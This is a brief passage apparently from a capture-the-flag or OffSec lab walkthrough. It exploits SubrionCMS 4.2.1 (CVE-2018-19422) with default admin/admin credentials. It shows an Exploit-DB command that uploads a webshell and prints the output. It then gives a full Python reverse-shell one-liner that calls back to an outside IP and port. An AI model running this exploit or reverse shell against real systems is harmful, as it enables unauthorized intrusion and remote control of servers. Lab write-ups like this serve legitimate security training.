Look out for default credentials and use the following exploit to get a webshell.
python3 /usr/share/exploitdb/exploits/php/webapps/49876.py -u http://exfiltrated.offsec/panel/ --user admin --pass admin
[+] SubrionCMS 4.2.1 - File Upload Bypass to RCE - CVE-2018-19422
[+] Trying to connect to: http://exfiltrated.offsec/panel/
[+] Success!
[+] Got CSRF token: DDfwZ8GPEC2Tg8VVe1YRcFpRjJa9FYyVqFKUT1w8
[+] Trying to log in...
[+] Login Successful!
[+] Generating random name for Webshell...
[+] Generated webshell name: opeiofhyesciqss
[+] Trying to Upload Webshell..
[+] Upload Success... Webshell path: http://exfiltrated.offsec/panel/uploads/opeiofhyesciqss.phar
$ export RHOST="192.168.49.135";export RPORT=80;python3 -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
$ ^C
[x] Failed to execute PHP code...
